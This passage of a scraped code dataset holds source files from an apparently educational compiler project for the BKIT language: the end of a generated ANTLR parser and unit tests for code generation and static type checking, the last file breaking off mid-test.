self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_non_init\" ):\n listener.enterVar_non_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_non_init\" ):\n listener.exitVar_non_init(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_var_non_init)\n self._la = 0 # Token type\n try:\n self.state = 413\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 404\n self.match(BKITParser.ID)\n self.state = 408 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 405\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n self.match(BKITParser.INT_LIT)\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 410 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 412\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterComposite_var\" ):\n listener.enterComposite_var(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitComposite_var\" ):\n listener.exitComposite_var(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 415\n self.match(BKITParser.ID)\n self.state = 420 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 416\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 417\n self.expr()\n self.state = 418\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 422 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterComposite_init\" ):\n listener.enterComposite_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitComposite_init\" ):\n listener.exitComposite_init(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 424\n self.composite_var()\n self.state = 425\n self.match(BKITParser.ASSIGN)\n self.state = 426\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterPrimitive_init\" ):\n listener.enterPrimitive_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitPrimitive_init\" ):\n listener.exitPrimitive_init(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.ID)\n self.state = 429\n self.match(BKITParser.ASSIGN)\n self.state = 430\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterParams_list\" ):\n listener.enterParams_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitParams_list\" ):\n listener.exitParams_list(self)\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 432\n self.var_non_init()\n self.state = 437\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 433\n self.match(BKITParser.COMMA)\n self.state = 434\n self.var_non_init()\n self.state = 439\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[16] = self.expr1_sempred\n self._predicates[17] = self.expr2_sempred\n self._predicates[18] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3833611011505127, "alphanum_fraction": 0.407491534948349, "avg_line_length": 23.730337142944336, "blob_id": "8a4e61b40ecc3d79c7addba34f7f47689e47dde9", "content_id": "76e49c42fd75bcef27f5aed43a046fb77fbba486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19809, "license_type": "no_license", "max_line_length": 76, "num_lines": 801, "path": "/Assignments/assignment4/src/test/CodeGenSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestCodeGen\nfrom AST import *\n\n\nclass CheckCodeGenSuite(unittest.TestCase):\n # def test_int(self):\n # \"\"\"Simple program: int main() {} \"\"\"\n # input = \"\"\"Function: main\n # Body: \n # print(string_of_int(120));\n # EndBody.\"\"\"\n # expect = \"120\"\n # self.assertTrue(TestCodeGen.test(input,expect,500))\n # def test_int_ast(self):\n # \tinput = Program([\n # \t\tFuncDecl(Id(\"main\"),[],([],[\n # \t\t\tCallStmt(Id(\"print\"),[\n # CallExpr(Id(\"string_of_int\"),[IntLiteral(120)])])]))])\n # \texpect = \"120\"\n # \tself.assertTrue(TestCodeGen.test(input,expect,501))\n\n # def test_decl(self):\n # input = \"\"\"\n # Var: x = 1;\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 502))\n \n # def test_main(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 503))\n \n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 504))\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body: \n # Var: x = 1, y = 3;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 505))\n\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1, y = 3;\n # y = x;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 506))\n\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z\n # Body: \n # Var: x = 1;\n # y = x;\n # z = 1.2;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 507))\n \n # def test_arr(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {1,2};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 508))\n\n # def test_arr(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{1},{2}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 509))\n \n # def test_arr_flit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{1.2},{2.3}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 510))\n\n # def test_str_flit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{\"ab\"},{\"cd\"}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 511))\n \n # def test_arr_blit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{\"ab\"},{\"cd\"}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 511))\n\n # def test_infer(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1][3]\n # Body: \n # Var: x = 1;\n # y = x;\n # z[1][1][1] = 1;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 512))\n\n # def test_if_without_infer(self):\n # \"\"\"Do not have else\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 513))\n\n # def test_if_with_else(self):\n # \"\"\"Do have else\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 514))\n\n # def test_if_with_return(self):\n # \"\"\"Do have return\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 515))\n\n # def test_if_with_inif(self):\n # \"\"\"Do have elseif\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # ElseIf !y Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 516))\n\n # def test_if_with_complex_expr(self):\n # \"\"\"Do have complex expr\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y && False Then x = 2;\n # ElseIf 1 < 2 Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 517))\n \n # def test_if_with_complex_expr(self):\n # \"\"\"Do have complex expr and infer\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # If y && z Then x = 2;\n # ElseIf 1 < 2 Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 518))\n\n # def test_simple_while(self):\n # \"\"\"Do have simple while\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # While y Do y = False;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 518))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while with infer type\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do y = False;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 519))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have decl\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Break;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 519))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Break;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 520))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have continue\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Continue;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 521))\n\n # def test_simple_for(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # For (x = 0, y, 1) Do\n # x = 2;\n # EndFor.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 521))\n\n # def test_simple_dowhile(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # Do x = 2 While y EndDo.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 522))\n\n # def test_simple_dowhile(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(\"abs\");\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # z = 1;\n # Return ;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 523))\n\n # def test_callee(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(\"abs\");\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # printStrLn(\"abs\");\n # Return ;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 524))\n\n\n # def test_callee_expr(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2];\n # x = foo();\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # printStrLn(\"abs\");\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 525))\n\n # def test_arr_1(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2] = {{1,2}};\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 526))\n\n # def test_arr_2(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2] = {{1,2}};\n # printStrLn(string_of_int(y[0][1]));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 527))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body: \n # Var: x = 1;\n # z = 999;\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 528))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 529))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # x= 10;\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 530))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # x= 10 + fooo(1);\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # Function: fooo\n # Parameter: z\n # Body: \n # Return z;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 531))\n # def test_if(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # If x[0] < 2 Then x[1] = 5;\n # ElseIf x[1] > 4 Then x[1] =10;\n # Return;\n # Else x[1] = 3;\n # EndIf.\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 532))\n\n # def test_callee(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # x[1] = foo(x[2], foo(1,2));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: x, y\n # Body:\n # Return x + y;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 533))\n\n # def test_if_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # If x[1] > 1 Then\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # EndIf.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 534))\n\n # def test_while_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, x = 10;\n # While y[1] < 10 Do\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # y[1] = y[1] + 1;\n # EndWhile.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 535))\n\n # def test_dowhile_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, x = 10;\n # Do\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # y[1] = y[1] + 1;\n # While y[1] < 10\n # EndDo.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 536))\n\n # def test_dowhile_var(self):\n # input = \"\"\"\n # Var: l = 999;\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, z = 10, x = 1;\n # For (x = 1, x < 10, 1) Do\n # Var: z = 1;\n # printStrLn(string_of_int(x));\n # EndFor.\n # printStrLn(string_of_int(l));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 537))\n\n def test_static(self):\n input = \"\"\"\n Function: main\n Body:\n Var: x = 1;\n printStrLn(string_of_int(foo(1, foo(x, 1))));\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return x + y;\n EndBody.\n \"\"\"\n expect = \"2\"\n self.assertTrue(TestCodeGen.test(input, expect, 538))\n\n\n # def test_static(self):\n # input = \"\"\"\n # Var: k = 999;\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, z = 10, x = 1;\n # For (x = 1, x < 10, 1) Do\n # Var: z = 1;\n # printStrLn(string_of_int(k));\n # EndFor.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 538))\n" }, { "alpha_fraction": 0.3934398889541626, "alphanum_fraction": 0.4166995882987976, "avg_line_length": 30.26055908203125, "blob_id": "2584d204afe35794150f0eaeb289ad82384e5356", "content_id": "adf1bcc6f040bf988a3d12c7b8de2744234130f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48109, "license_type": "no_license", "max_line_length": 195, "num_lines": 1539, "path": "/Assignments/assignment3/src/test/CheckSuiteAnU.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestChecker\nfrom StaticError import *\nfrom AST import *\n\nclass CheckSuite(unittest.TestCase):\n\n def test_401(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n \"\"\"\n expect = str(NoEntryPoint())\n self.assertTrue(TestChecker.test(input,expect,401))\n \n def test_402(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n\n Function: main\n Body:\n x=1;\n EndBody. \n \"\"\"\n expect = str(Undeclared(Identifier(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,402))\n \n def test_403(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n\n Function: main\n Parameter:x\n Body:\n x=1;\n x=1.6;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(1.6))))\n self.assertTrue(TestChecker.test(input,expect,403))\n \n def test_404(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n EndBody.\n Function: main\n Body:\n Var: x, y = 0.5;\n x = 1. +. foo(1);\n y = foo(2.5) -. 1.;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[FloatLiteral(2.5)])))\n self.assertTrue(TestChecker.test(input,expect,404))\n \n def test_405(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n Return;\n EndBody.\n Function: main\n Body:\n Var: x, y = 0.5;\n foo(x);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n self.assertTrue(TestChecker.test(input,expect,405))\n \n def test_406(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Body:\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"main\"))\n self.assertTrue(TestChecker.test(input,expect,406))\n \n def test_407(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body:\n x = 1; \n main( 1.1, 0); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[FloatLiteral(1.1),IntLiteral(0)])))\n self.assertTrue(TestChecker.test(input,expect,407))\n \n def test_408(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo \n Parameter: x,y\n Body:\n EndBody.\n Function: main\n Parameter: x,y\n Body:\n foo(1,2); \n foo(1. , 2.); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[FloatLiteral(1.0),FloatLiteral(2.0)])))\n self.assertTrue(TestChecker.test(input,expect,408))\n \n def test_409(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x,y\n Body:\n y=0.5;\n For(x=1,x==1,x+1) Do\n EndFor.\n For(y=1,1==1,y +. 1.2) Do\n EndFor.\n EndBody. \n 